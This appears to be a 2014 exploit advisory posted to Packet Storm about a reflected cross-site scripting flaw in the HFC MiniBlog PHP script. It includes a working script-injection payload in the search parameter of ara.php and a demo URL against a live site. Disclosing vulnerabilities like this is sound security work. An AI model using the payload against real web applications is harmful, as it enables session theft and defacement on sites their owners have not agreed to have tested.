HFC MiniBlog Cross Site Scripting

2014-05-04T00:00:00
ID PACKETSTORM:126468
Type packetstorm
Reporter kurdish hackers team
Modified 2014-05-04T00:00:00

Description

                                        
                                            `=====================================================  
HFC_MiniBlog php script Cross Site Scripting Vulnerability  
-----------------------------------------------------------  
foun by :kurdish hackers team  
group : kurd-team  
contact : pshela@yahoo.com  
site : kurdteam.org  
-----------------------------------------------------------  
------------------------script-----------------------------  
-----------------------------------------------------------  
site script :http://www.hfc-miniblog.tk/  
dawnload :http://turbobit.net/whc8o1cwif2y.html  
rar password :www.scriptim.org  
(tested by Maxthon Cloud Browser, firefox)  
----the script turkish lang----  
-----------------------------------------------------------  
Exploit:  
-------  
site.com/path/ara.php?q="><script>alert('explo3ter')</script>&=  
demo :  
http://www.hfc-miniblog.tk/ara.php?q="><script>alert('explo3ter')</script>&=  
-----------------------------------------------------------  
Zryan_kurd ,hamw andamani p4kurd.com  
-----------------------------------------------------------  
`